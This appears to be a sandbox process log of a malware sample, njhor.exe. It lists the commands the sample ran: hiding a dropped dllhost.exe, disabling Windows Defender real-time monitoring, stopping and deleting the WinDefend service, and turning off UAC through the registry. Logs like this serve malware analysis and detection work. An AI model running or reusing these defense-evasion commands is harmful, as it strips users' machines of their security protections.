njhor.exe "C:\Users\test22\AppData\Local\Temp\njhor.exe"
2552attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\dllhost.exe"
2816powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
2936sc.exe sc query windefend
1152sc.exe sc stop windefend
152sc.exe sc delete windefend
2316cmd.exe cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2444reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2568